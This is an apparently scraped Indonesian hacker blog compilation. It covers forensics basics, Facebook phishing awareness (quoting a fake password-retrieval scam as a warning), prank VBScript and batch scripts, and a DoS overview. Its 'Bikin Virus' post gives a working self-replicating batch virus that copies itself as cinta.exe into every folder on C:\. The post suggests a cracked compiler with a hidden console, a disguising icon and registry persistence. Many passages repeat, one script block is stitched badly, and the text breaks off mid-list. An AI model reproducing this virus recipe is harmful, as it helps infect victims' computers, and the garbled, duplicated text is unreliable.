Analisa terhadap barang bukti bertujuan untuk membentuk petunjuk yang ada, mengidentifikas tersangka, format data, pengembangan barang bukti mengrekontruksi kejahatan yang dilakukan dan mengumpulkan lebih banyak data. Data yang didapat mungkin saja mengarah ke IP address tertentu, nama-nama file yang ada, system name, jenis file dan isinya, software yang terinstall, motif, cara dan tools lain yang digunakan dapat kita ungkap.
Format data harus menjadi perhatian kita karena ada banyak system yang standar sampai yang
non standar, data yang terkompresi, dienkrpsi biasanya data yang menjadi perhatian adalah
data yang telah dihapus atau sengaja disembunyikan dengan metode enkripsi tertentu.
Dalam kasus biasanya dalam kepolisian, polisi harus bertindak berdasarkan bukti yang konkrit,
apakah ada karakteristik pembuktian secara khusus dalam dunia digital dan cyber ini ?
Sama seperti pembuktian secara umum dalam dunia digital atau forensic ini ada beberapa
karakteristik khusus, seperti ;
• Admission (dapat diterima), dengan menyertakan bukti dokumen atau catatan selama
pemeriksaan
• Otentik, dapat menjelaskan secara spesifik seperti file dan kejadian yang dapat berupa
logging, audit logs, access list, dll
• Akurat, dapat membuktikan proses system tidak hanya isi datanya sampai dengan output
yang dihasilkan
• Komplit, dapat menceritakan secara lengkap dan utuh sampai akhir
• Menyakinkan didepan pengadilan, dapat dipresentasikan atau dijelaskan didepan
pengadilan dengan jelas dan akurat.
Computer forensics sangat berhubungan dengan pembuktian fakta maupun interpretasi, fakta
dikumpulkan dan didokumentasi, sedangkan interpretasi bersifat subyektif, untuk itu
kebenaran harus dapat diturunkan daro eksperiman.
Tadi disinggung masalah log-log dalam tahapan analisa dan karakterisitk dalam dunia forensic
ini, apa saja yang harus kita perhatikan dalam menanalisis suatu log system ?
Ada beberapa file log yang harus menjadi perhatian kita sebagai ahli forensics dan detective
digital, diantaranya ;
• Temp File
• Recycle bin
• Informasi file fragmentasi disk
• Recent link files
• Spool printed files
• Internet history (temp)
• Registry
• Space yang tidak digunakan pada disk
• Sector pada disk.
Sekian dulu artikelnya… Salam Hacker
Melingdungi facebook dari trik hacker umum
Kita semua tahu kalau Facebook merupakan situs jejaring sosial yang besar, dan tentunya sistem pengamanan Facebook sangat sulit untuk dijebol bahkan untuk master hacker sekalipun. Lalu bagaimana dengan kasus hacker yang sering terjadi akhir-akhir ini?
Untuk kasus tersebut, hacker hanya memanfaatkan ketidak tahuan dan kepolosan para pengguna Facebook untuk memberitahukan passwordnya sendiri kepada hacker.
Cukup basa-basinya! Ada beberapa trik umum yang digunakan para hacker untuk mencuri username dan password akun Facebook, nah kali ini aku akan memberi tips untuk menghindari trik-trik tersebut.
1. Fake Log in/Phising Facebook/Halaman Palsu
Trik ini memanfaatkan para pengunjung agar log in ke halaman palsu yang dibuat oleh hacker, jika kamu log in di halaman tersebut, username dan password kamu akan terkirim ke tangan hacker.
Ada 3 jenis halaman palsu
• Simple Fake Log in (Low Quality)
Setelah log in di Halaman palsu tersebut, username dan password kamu akan disimpan oleh hacker dan setelah log in kamu akan tetap berada di halaman tersebut.
• Standar Fake Log in (Medium Quality)
Setelah log in di halaman palsu tersebut username dan password akan disimpan oleh hacker, dan kamu akan dialihkan ke halaman log in Facebook yang asli, sehingga terkesan kamu salah memasukkan password dan harus login sekali lagi.
• Best Fake Log in (High Quality)
halaman palsu ini akan membuat kamu login di dua tempat, yang satu di tangan hacker dan yang satunya lagi di Facebook asli, dan setelah login kamu akan dibawa ke halaman beranda Facebook.
Wah wah wah bahaya nih untuk mengindari hal ini, kamu harus terus memperhatikan address bar browser kamu selalu bertuliskan: facebook.com
Sebab url halaman palsu tidak mungkin bertuliskan facebook.com, bisa saja beralamatkan www.yudhaime.co.cc dengan tampilan mirip Facebook.
Yang kedua, waspadalah dalam mengklik sebuah link, bisa saja kamu dibawa ke halaman palsu, jika tiba-tiba kamu disuruh log in kembali periksa alamat web dan kembali ke www.facebook.com jika url halaman tidak sesuai.
2. Menipu melalui e-mail
Sang hacker mengirimimu sebuah email yang mengklaim dari facebook, yang seakan-akan ada notifikasi/pemberitahuan dari Facebook.
Mungkin emailnya kurang lebih seperti ini:
Nah link yang tertera akan tertuju ke halaman palsu. Untuk menghindari trik ini, kamu klik kanan link tersebut dan pilih properties, jika alamat yang tertera bukan www.facebook.com, jangan klik link tersebut!
3. Hacker menipu calon Hacker
Pernah membaca artikel seperti di bawah ini?
Nah orang yang polos dan berniat jahat pasti akan melakukan apa yang diperintahkan, padahal sebenarnya Facebook kamulah yang kena hack. Jadi jangan sekali-kali mengikuti trik tersebut.
4. Hack melalui Keylogger
Keylogger merupakan sebuah aplikasi yang akan merekam segala kegiatan yang dilakukan di sebuah komputer yang terinstal keylogger. Aplikasi ini sebenarnya digunakan oleh para orang tua untuk memantau kegiatan anak di dunia maya. Tapi oleh segelintir orang (biasanya di warnet-warnet) keylogger digunakan untuk merekam kegiatan orang lain.
Untuk menghindari hal ini, jangan sekali-kali login menggunakan keyboard di warnet, tapi gunakanlah virtual keyboard .
5. Hack melalui aplikasi Freezer
Aplikasi-aplikasi semacam itu, akan membekukan akun kita dan membuat kita tidak bisa login. Untuk menghindarinya, jangan biarkan semua orang mengetahui alamat email yang kamu gunakan di Facebook. Atau untuk lebih amannya, ganti alamat email secara berkala, atau sembunyikan email anda lewat pengaturan facebook sendiri.
6. Hack melalui Cookies
Cookies memang benar-benar menjadi cookies bagi para hacker (bingung gak) cookies, cache, merupakan data-data yang tersimpan selama kamu surfing di internet, bayangkan apa yang terjadi jika cookies dibuka hacker? Wah gawat ntuh! Makannya setiap habis ngenet klik tools => clear private data (shortcutnya ctrl+shift+alt+k atau ctrl+alt+F7)
Selain tips diatas, ikuti juga tips dibawah ini demi keamanan:
1. Logoutlah sehabis online!
2. Gunakan kombinasi angka dan huruf pada password untuk menyulitkan hacker mengingat password anda!
3. Jangan upload private foto di Facebook
4. Jangan menuliskan data diri terlalu penting di Facebook.
5. Jangan sembarangan meng'confirm' friend request di Facebook
6. Jangan gunakan password yang sama dengan akun email kamu!
7. Berhati-hatilah memilih aplikasi di Facebook.
8. Waspadai undangan-undangan yang gak jelas.
9. Jangan gunakan nomor hp sebagai password.
Yah untuk sementara itu dulu yang bisa ku kasih, capek banget nih tanganku habis mengetik segini banyaknya. Salam Hacker
Untuk kasus tersebut, hacker hanya memanfaatkan ketidak tahuan dan kepolosan para pengguna Facebook untuk memberitahukan passwordnya sendiri kepada hacker.
Cukup basa-basinya! Ada beberapa trik umum yang digunakan para hacker untuk mencuri username dan password akun Facebook, nah kali ini aku akan memberi tips untuk menghindari trik-trik tersebut.
1. Fake Log in/Phising Facebook/Halaman Palsu
Trik ini memanfaatkan para pengunjung agar log in ke halaman palsu yang dibuat oleh hacker, jika kamu log in di halaman tersebut, username dan password kamu akan terkirim ke tangan hacker.
Ada 3 jenis halaman palsu
• Simple Fake Log in (Low Quality)
Setelah log in di Halaman palsu tersebut, username dan password kamu akan disimpan oleh hacker dan setelah log in kamu akan tetap berada di halaman tersebut.
• Standar Fake Log in (Medium Quality)
Setelah log in di halaman palsu tersebut username dan password akan disimpan oleh hacker, dan kamu akan dialihkan ke halaman log in Facebook yang asli, sehingga terkesan kamu salah memasukkan password dan harus login sekali lagi.
• Best Fake Log in (High Quality)
halaman palsu ini akan membuat kamu login di dua tempat, yang satu di tangan hacker dan yang satunya lagi di Facebook asli, dan setelah login kamu akan dibawa ke halaman beranda Facebook.
Wah wah wah bahaya nih untuk mengindari hal ini, kamu harus terus memperhatikan address bar browser kamu selalu bertuliskan: facebook.com
Sebab url halaman palsu tidak mungkin bertuliskan facebook.com, bisa saja beralamatkan www.yudhaime.co.cc dengan tampilan mirip Facebook.
Yang kedua, waspadalah dalam mengklik sebuah link, bisa saja kamu dibawa ke halaman palsu, jika tiba-tiba kamu disuruh log in kembali periksa alamat web dan kembali ke www.facebook.com jika url halaman tidak sesuai.
2. Menipu melalui e-mail
Sang hacker mengirimimu sebuah email yang mengklaim dari facebook, yang seakan-akan ada notifikasi/pemberitahuan dari Facebook.
Mungkin emailnya kurang lebih seperti ini:
Rin Sakuragi menambahkan Anda sebagai teman di Facebook. Kami perlu mengkonfirmasi bahwa Anda mengenal Nia agar Anda dapat berteman dengannya di Facebook.
Nah link yang tertera akan tertuju ke halaman palsu. Untuk menghindari trik ini, kamu klik kanan link tersebut dan pilih properties, jika alamat yang tertera bukan www.facebook.com, jangan klik link tersebut!
3. Hacker menipu calon Hacker
Pernah membaca artikel seperti di bawah ini?
Cara Menghack Facebook dengan Email
Tak banyak yang tau kalau ternyata facebook dan yahoo menjalin sebuah kerja sama yang unik, hal ini baru saya tau beberapa waktu yang lalu dari seorang kawan yg kebetulan juga baru mendapatkan informasi ini.
Dan dengan memanfaatkan celah dari kerja sama inilah kita dapat mengetahui password dari account facebook seseorang dengan sangat mudah.
Saya sendiri sudah mencoba beberapa cara dan selalu gagal, sudah men-download berbagai macam software dalam usaha ini tapi tetap saja tak berhasil mendapatkan password account yg di incar.
Tapi ternyata, setelah mengetahui celah ini, saya sampai merasa bodoh sendiri. Karena ternyata sangat mudah mendapatkan password facebook seseorang jika kita tau cara yg tepat.
Dan sama sekali tidak memerlukan software…!!
oke akan saya jelaskan caranya..
1. login ke yahoo.
ingat..!! account yahoo anda harus berumur minimal 30 hari agar cara ini bekerja dengan baik dan harus merupakan alamat
yg anda gunakan pada saat registrasi facebook. Yahoo akan dengan otomatis menolak email yg tidak terhubung ke Facebook.
2. Jika sudah masuk ke yahoo, tulislah sebuah email yang anda tujukan untuk staff facebook di Yahoo dengan alamat email:
emailfacebooktipuan@yahoo.com
server Yahoo akan mengirimkan secara otomatis password "terlupakan" tersebut.
3. Pada baris SUBJECT masukkan/ketik kalimat : PASSWORD RETRIEVE
4. lalu pada baris pertama mail anda tuliskan alamat email korban yg akan anda hack
5. Pada baris kedua masukkan alamat email yg anda gunakan
6. Pada baris ketiga tuliskan password yahoo anda.
Ingat, password yang anda masukkan inilah yang akan menentukan berhasil tidaknya usaha anda karena sever yahoo akan secara otomatis melakukan login untuk meng-konfirmasi valid atau tidaknya email andan, dengan kata lain server yahoo akan meng-extract password dari email calon korban anda dengan menggunakan password anda.
Dan proses ini sangat aman karena anda mengirim email kepada mesin dan bukan kepada seseorang.
7. Dan di baris terakhir masukkan kata : cgi-bin/$et76431&pwrsa ini merupakan kode yang dibutuhkan untuk men-cocokkan email anda dengan email calon korban yg anda minta password nnya.
jadi jika misalkan email anda adalah cinta.laura@yahoo.com
dan email korban anda adalah krisdayanti@yahoo.com
dan password anda adalah : rahasia
maka email yg anda tulis nantinya adalah:
To: facebook_retrieve@yahoo.com
bcc: cc: (biarkan kosong)
Subject: password retrieve
krisdayanti@yahoo.com
cinta.laura@yahoo.com
rahasia
cgi-bin/$et76431&pwrsa
selanjutnya setelah anda mengirim email tersebut anda akan mendapatkan balasan secara otomatis dari yahoo dengan dengan subject: System Reg
Message
biasanya yahoo memerlukan waktu sekitar 30 menit untuk mengkonfirmasikan dan meng-extract password yang anda minta.
selamat mencoba…
Nah orang yang polos dan berniat jahat pasti akan melakukan apa yang diperintahkan, padahal sebenarnya Facebook kamulah yang kena hack. Jadi jangan sekali-kali mengikuti trik tersebut.
4. Hack melalui Keylogger
Keylogger merupakan sebuah aplikasi yang akan merekam segala kegiatan yang dilakukan di sebuah komputer yang terinstal keylogger. Aplikasi ini sebenarnya digunakan oleh para orang tua untuk memantau kegiatan anak di dunia maya. Tapi oleh segelintir orang (biasanya di warnet-warnet) keylogger digunakan untuk merekam kegiatan orang lain.
Untuk menghindari hal ini, jangan sekali-kali login menggunakan keyboard di warnet, tapi gunakanlah virtual keyboard .
5. Hack melalui aplikasi Freezer
Aplikasi-aplikasi semacam itu, akan membekukan akun kita dan membuat kita tidak bisa login. Untuk menghindarinya, jangan biarkan semua orang mengetahui alamat email yang kamu gunakan di Facebook. Atau untuk lebih amannya, ganti alamat email secara berkala, atau sembunyikan email anda lewat pengaturan facebook sendiri.
6. Hack melalui Cookies
Cookies memang benar-benar menjadi cookies bagi para hacker (bingung gak) cookies, cache, merupakan data-data yang tersimpan selama kamu surfing di internet, bayangkan apa yang terjadi jika cookies dibuka hacker? Wah gawat ntuh! Makannya setiap habis ngenet klik tools => clear private data (shortcutnya ctrl+shift+alt+k atau ctrl+alt+F7)
Selain tips diatas, ikuti juga tips dibawah ini demi keamanan:
1. Logoutlah sehabis online!
2. Gunakan kombinasi angka dan huruf pada password untuk menyulitkan hacker mengingat password anda!
3. Jangan upload private foto di Facebook
4. Jangan menuliskan data diri terlalu penting di Facebook.
5. Jangan sembarangan meng'confirm' friend request di Facebook
6. Jangan gunakan password yang sama dengan akun email kamu!
7. Berhati-hatilah memilih aplikasi di Facebook.
8. Waspadai undangan-undangan yang gak jelas.
9. Jangan gunakan nomor hp sebagai password.
Yah untuk sementara itu dulu yang bisa ku kasih, capek banget nih tanganku habis mengetik segini banyaknya. Salam Hacker
Cara Membuat Virus Palsu
Mari kita mulai untuk membuat "virus" palsu tersebut dengan mengikuti langkah-langkah yang saya berikan di bawah ini:
1. Bukalah aplikasi "Notepad" (Start > All Programs > Accessories > Notepad)
2. Ketik: x=msgbox("VIRUS TERDETEKSI",vbCritical,"BAHAYA!")
3. Klik dan pilih, File>Save as... (Ketikkan nama file "Virus", ubah ekstensi .txt menjadi .vbs)
4. Lalu, buka file tersebut!
5. APA YANG TERJADI!?
Akan muncul sebuah kotak dialog yang memberitahukan bahwa virus telah terdeteksi. Hahahhahhahaa...
Anda juga dapat menjahilin teman Anda dengan trik ini di komputer teman Anda. Baiklah, mari kita coba variasi yang lain:
1. Ketikkan: x=msgbox("VIRUS TERDETEKSI",vbCritical,"BAHAYA!")
2. Tekan "Enter", lalu ketik: x=msgbox("Komputer Anda akan mati dalam waktu...",vbCritical,"BAHAYA!")
3. Tekan "Enter", lalu ketik: x=msgbox("3",vbCritical,"Shutdown")
4. Tekan "Enter", lalu ketik: x=msgbox("2",vbCritical,"Shutdown")
5. Tekan "Enter", lalu ketik: x=msgbox("1",vbCritical,"Shutdown")
6. Tekan "Enter", lalu ketik: x=msgbox("0",vbCritical,"Shutdown")
7. Tekan "Enter", lalu ketik: x=msgbox("Selamat Tinggal!",vbCritical,"Shutdown")
8. Klik dan pilih, File > Save as... (Ketikkan nama file "Virus2", ubah ekstensi .txt menjadi .vbs)
9. Lalu, buka file tersebut!
Hahaha... Bagaimana? Cukup menarik bukan? Anda juga dapat membuat variasi yang lain jika Anda mau. Sebenarnya, rahasia dari trik ini adalah, mengetikkan kode-kode ke Notepad dan di-save ke dalam bentuk VBScript (VBS). Ya, kira-kira begitulah...
NB: Jika Anda cukup kreatif dalam membuat hal seperti di atas, silahkan tuliskan variasi-variasi Anda yang lain dengan cara berkomentar di bawah ini.
1. Bukalah aplikasi "Notepad" (Start > All Programs > Accessories > Notepad)
2. Ketik: x=msgbox("VIRUS TERDETEKSI",vbCritical,"BAHAYA!")
3. Klik dan pilih, File>Save as... (Ketikkan nama file "Virus", ubah ekstensi .txt menjadi .vbs)
4. Lalu, buka file tersebut!
5. APA YANG TERJADI!?
Akan muncul sebuah kotak dialog yang memberitahukan bahwa virus telah terdeteksi. Hahahhahhahaa...
Anda juga dapat menjahilin teman Anda dengan trik ini di komputer teman Anda. Baiklah, mari kita coba variasi yang lain:
1. Ketikkan: x=msgbox("VIRUS TERDETEKSI",vbCritical,"BAHAYA!")
2. Tekan "Enter", lalu ketik: x=msgbox("Komputer Anda akan mati dalam waktu...",vbCritical,"BAHAYA!")
3. Tekan "Enter", lalu ketik: x=msgbox("3",vbCritical,"Shutdown")
4. Tekan "Enter", lalu ketik: x=msgbox("2",vbCritical,"Shutdown")
5. Tekan "Enter", lalu ketik: x=msgbox("1",vbCritical,"Shutdown")
6. Tekan "Enter", lalu ketik: x=msgbox("0",vbCritical,"Shutdown")
7. Tekan "Enter", lalu ketik: x=msgbox("Selamat Tinggal!",vbCritical,"Shutdown")
8. Klik dan pilih, File > Save as... (Ketikkan nama file "Virus2", ubah ekstensi .txt menjadi .vbs)
9. Lalu, buka file tersebut!
Hahaha... Bagaimana? Cukup menarik bukan? Anda juga dapat membuat variasi yang lain jika Anda mau. Sebenarnya, rahasia dari trik ini adalah, mengetikkan kode-kode ke Notepad dan di-save ke dalam bentuk VBScript (VBS). Ya, kira-kira begitulah...
NB: Jika Anda cukup kreatif dalam membuat hal seperti di atas, silahkan tuliskan variasi-variasi Anda yang lain dengan cara berkomentar di bawah ini.
Cara Membuat Pesan Hantu
Lihat judulnya aja sudah takut Pesan Hantu. Ini adalah cara Prank. Sebelum kita ketahui apa itu Prank???.......
Prank adalah sekumpulan program dan trik dan tips untuk menakuti korban. Memang cara kerja Prank seperti virus, membuat komputer korban menjadi tidak wajar ( gila ). Bisa dibilang prank itu adalah Virus Putih ( Perlu diingat cara prank tidak pernah dan ngak akan merusakin sistem komputer pada korban ) Jadi aman bila dipraktekkan di kompi sendiri. Sebutan untuk orang yang buat prank adalah Prankers.
Nah mau tahu cara buat prank. Lansung aja ke TKP…!!!!!
Cara membuatnya mudah sekali kok kita hanya bermodalkan notepad. Cara ini ampuh banget jika dipraktekan dan tanpa virus loh.. Si korban akan merasa bahwa komputernya kerasukan hantu..
Hiiii.....!!!!! Serem...(Lebayyyyyyyy) Pesan ini akan muncul pada saat computer korban booting
Pokonya simak aja dech cara buatnya oke...
Cara buat Pesan Hantu:
1.> Klik Start --> Pilih dan Klik Search
2.> Setelah itu ketik autoexec.bat dan klik Search Now.
3.> Kemudian klik kanan --> pilih dan klik menu Edit .
4.> Setelah itu akan terbuka notepad. Kemudian kamu copy/ketik perintah dibawah ini:
Echo off
Echo Pesan Dari neraka: Hai.... Apakah kamu tahu siapa aku ini
Echo Aku akan menghantui kamu sampai kiamat nanti
Echo Saya akan terus hantui anda sepanjang hidup anda
For %%C in(A B C D E F G H I J K L) do Dir C:\Windows >Null
Echo
Echo You're Death
Kamu bisa merubah tulisan berwarna Merah tersebut dengan sesuka anda... Gimana Kerenkan hasil kreasinya.
Lumayan hebatkan. Jika kamu ingin lebih lihat trik - tips prank kamu bisa, dan juga cara mengatasinya datang di: www.PinginUsil.blogspot.com.
Dan bila kamu punya sedikit tentang ilmu komputer utk menjahilin komputer orang lain, kamu bisa share di thread ini..
Ada pepatah prank yang mengatakan " Lebih baik mengusilin daripada di usillin "…
Hahhahaha… Salam Hacker
Prank adalah sekumpulan program dan trik dan tips untuk menakuti korban. Memang cara kerja Prank seperti virus, membuat komputer korban menjadi tidak wajar ( gila ). Bisa dibilang prank itu adalah Virus Putih ( Perlu diingat cara prank tidak pernah dan ngak akan merusakin sistem komputer pada korban ) Jadi aman bila dipraktekkan di kompi sendiri. Sebutan untuk orang yang buat prank adalah Prankers.
Nah mau tahu cara buat prank. Lansung aja ke TKP…!!!!!
Cara membuatnya mudah sekali kok kita hanya bermodalkan notepad. Cara ini ampuh banget jika dipraktekan dan tanpa virus loh.. Si korban akan merasa bahwa komputernya kerasukan hantu..
Hiiii.....!!!!! Serem...(Lebayyyyyyyy) Pesan ini akan muncul pada saat computer korban booting
Pokonya simak aja dech cara buatnya oke...
Cara buat Pesan Hantu:
1.> Klik Start --> Pilih dan Klik Search
2.> Setelah itu ketik autoexec.bat dan klik Search Now.
3.> Kemudian klik kanan --> pilih dan klik menu Edit .
4.> Setelah itu akan terbuka notepad. Kemudian kamu copy/ketik perintah dibawah ini:
Echo off
Echo Pesan Dari neraka: Hai.... Apakah kamu tahu siapa aku ini
Echo Aku akan menghantui kamu sampai kiamat nanti
Echo Saya akan terus hantui anda sepanjang hidup anda
For %%C in(A B C D E F G H I J K L) do Dir C:\Windows >Null
Echo
Echo You're Death
Kamu bisa merubah tulisan berwarna Merah tersebut dengan sesuka anda... Gimana Kerenkan hasil kreasinya.
Lumayan hebatkan. Jika kamu ingin lebih lihat trik - tips prank kamu bisa, dan juga cara mengatasinya datang di: www.PinginUsil.blogspot.com.
Dan bila kamu punya sedikit tentang ilmu komputer utk menjahilin komputer orang lain, kamu bisa share di thread ini..
Ada pepatah prank yang mengatakan " Lebih baik mengusilin daripada di usillin "…
Hahhahaha… Salam Hacker
Mengenal Denial Of Service Attack
Denial of Service Attack lebih dikenal dengan istilah DoS attack. Serangan ini dilakukan untuk tujuan mematikan salah satu atau semua layanan yang ada pada suatu sistem tanpa permisi dari penguasa sistem.
Denial-of-service attack merupakan sebuah upaya serangan dengan jalan menurunkan kinerja sebuah web site dengan terus menerus mengulang request ke server dari banyak sumber secara simultan. Tujuan serangan seperti ini berakibat server korban jadi kewalahan melayani request yang terkirim dan berakhir dengan menghentikan aktivitas atau berhenti dengan sendirinya karena tak mampu melayani request. Kadang serangan yang dilakukan dengan cara ini dapat merusak atau mematikan sistem secara keseluruhan.
Denial-of-service merupakan serangan dengan ditandai oleh suatu usaha yang eksplisit dari penyerang untuk mencegah para pemakai yang sah menggunakan jasa pelayanan jaringan. Contohnya meliputi :
mencoba untuk membanjiri suatu jaringan, dengan demikian menghambat lalu lintas jaringan yang ada,
mencoba untuk mengganggu koneksi antar komputer, sehingga jasa pelayanan menjadi terhambat,
mencoba untuk mencegah individu tertentu untuk mengakses suatu layanan,
mencoba untuk mengganggu pelayanan seseorang atau suatu sistem yang spesifik.
Jenis serangan lainnya dapat meliputi denial of service sebagai komponen, tetapi denial of service dapat berupa bagian dari serangan yang lebih besar.
Penggunaan sumber daya yang illegal dapat pula mengakibatkan denial of service . Sebagai contoh, suatu penyerang dapat menggunakan wilayah ftp area tak bertuan sebagai tempat untuk menyimpan mencuri data suatu perangkat lunak komersil, memanfaatkan ruang disk dan memadatkan lalu lintas jaringan.
Serangan Denial-Of-Service utamanya bertujuan melumpuhkan komputer atau jaringan. Tergantung pada sifat alami perusahaan, hal ini yang secara efektif melumpuhkan organisasi..
Beberapa serangan denial-of-service dapat dieksekusi dengan sumber daya terbatas melawan terhadap suatu situsbesar yang canggih . Serangan jenis ini kadang-kadang disebut/dipanggil suatu " serangan tidak simetris (asymmetric attack)." Sebagai contoh, suatu penyerang dengan sebuah PC tua dan sebuah modem yang lambat mungkin mampu melumpuhkan banyak jaringan atau mesin yang lebih canggih dan lebih cepat.
Serangan Denial-Of-Service terdiri dari berbagai bentuk dan jenis layanan. Ada tiga jenis dasar serangan yaitu :
penggunaan hal yang langka, terbatas, atau sumber daya tidak dapat diperbarui,
perusakan atau perubahan konfigurasi informasi,
perusakan secara fisik atau perubahan komponen-komponen jaringan.
Oke para pembaca, sudah tau kan apa itu Denial Of Service Attack…//? Nah… apalagi ya? Lupa saya…hahhahhaha
sekian .
Salam Hacker ….
Denial-of-service attack merupakan sebuah upaya serangan dengan jalan menurunkan kinerja sebuah web site dengan terus menerus mengulang request ke server dari banyak sumber secara simultan. Tujuan serangan seperti ini berakibat server korban jadi kewalahan melayani request yang terkirim dan berakhir dengan menghentikan aktivitas atau berhenti dengan sendirinya karena tak mampu melayani request. Kadang serangan yang dilakukan dengan cara ini dapat merusak atau mematikan sistem secara keseluruhan.
Denial-of-service merupakan serangan dengan ditandai oleh suatu usaha yang eksplisit dari penyerang untuk mencegah para pemakai yang sah menggunakan jasa pelayanan jaringan. Contohnya meliputi :
mencoba untuk membanjiri suatu jaringan, dengan demikian menghambat lalu lintas jaringan yang ada,
mencoba untuk mengganggu koneksi antar komputer, sehingga jasa pelayanan menjadi terhambat,
mencoba untuk mencegah individu tertentu untuk mengakses suatu layanan,
mencoba untuk mengganggu pelayanan seseorang atau suatu sistem yang spesifik.
Jenis serangan lainnya dapat meliputi denial of service sebagai komponen, tetapi denial of service dapat berupa bagian dari serangan yang lebih besar.
Penggunaan sumber daya yang illegal dapat pula mengakibatkan denial of service . Sebagai contoh, suatu penyerang dapat menggunakan wilayah ftp area tak bertuan sebagai tempat untuk menyimpan mencuri data suatu perangkat lunak komersil, memanfaatkan ruang disk dan memadatkan lalu lintas jaringan.
Serangan Denial-Of-Service utamanya bertujuan melumpuhkan komputer atau jaringan. Tergantung pada sifat alami perusahaan, hal ini yang secara efektif melumpuhkan organisasi..
Beberapa serangan denial-of-service dapat dieksekusi dengan sumber daya terbatas melawan terhadap suatu situsbesar yang canggih . Serangan jenis ini kadang-kadang disebut/dipanggil suatu " serangan tidak simetris (asymmetric attack)." Sebagai contoh, suatu penyerang dengan sebuah PC tua dan sebuah modem yang lambat mungkin mampu melumpuhkan banyak jaringan atau mesin yang lebih canggih dan lebih cepat.
Serangan Denial-Of-Service terdiri dari berbagai bentuk dan jenis layanan. Ada tiga jenis dasar serangan yaitu :
penggunaan hal yang langka, terbatas, atau sumber daya tidak dapat diperbarui,
perusakan atau perubahan konfigurasi informasi,
perusakan secara fisik atau perubahan komponen-komponen jaringan.
Oke para pembaca, sudah tau kan apa itu Denial Of Service Attack…//? Nah… apalagi ya? Lupa saya…hahhahhaha
sekian .
Salam Hacker ….
Bikin Virus dengan perintah CMD
Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.
Yang perlu dipersiapkan:
1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer
quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).
Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.
Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .
Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.
Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “. Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d” ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “. Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d” ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.
Contoh: perintah cmd yang sudah kita buat
REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip
Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadifor %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip
REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip
Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.
Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “
Sumber : http://kidzoom.wordpress.com/2010/03/06/lan-hacking-dengan-wireshark/
Selasa, 07 Juni 2011
teknik-teknik dalam melakukan hacking
Teknik – teknik dibawah ini adalah teknik yang paling banyak digunakan oleh seorang Hacker :
1. IP Spoofing
